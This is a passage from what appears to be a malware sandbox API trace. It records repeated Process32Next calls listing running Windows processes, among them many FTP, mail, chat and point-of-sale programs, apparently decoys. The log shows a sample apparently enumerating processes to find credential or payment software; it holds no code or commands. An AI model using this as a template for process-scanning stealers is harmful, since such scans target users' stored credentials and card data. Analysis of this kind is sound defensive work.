th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.968] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0168.970] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0169.013] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0169.016] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.019] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.021] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0169.023] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.026] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.030] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.032] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.034] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.036] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.038] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.041] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0169.043] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0169.046] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.048] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0169.093] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.095] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0169.098] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0169.100] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0169.102] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0169.105] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0169.108] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0169.111] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.113] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.115] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0169.118] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0169.121] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.124] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.126] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0169.181] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0169.184] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0169.186] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0169.189] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0169.191] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0169.227] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0169.232] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0169.235] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0169.237] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0169.239] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0169.241] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0169.243] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0169.245] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0169.248] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0169.307] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0169.310] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0169.312] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0169.314] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0169.317] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0169.319] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0169.322] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0169.325] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0169.328] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0169.332] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0169.335] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0169.339] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0169.350] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0169.354] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0169.357] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0169.360] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0169.363] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0169.366] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0169.369] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0169.372] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0169.375] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0169.378] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0169.380] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0169.387] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0169.397] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0169.400] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0169.403] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0169.407] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0169.409] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0169.412] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0169.415] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0169.418] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0169.420] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0169.423] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0169.426] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0169.430] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0169.432] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0169.439] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0169.442] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0169.445] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 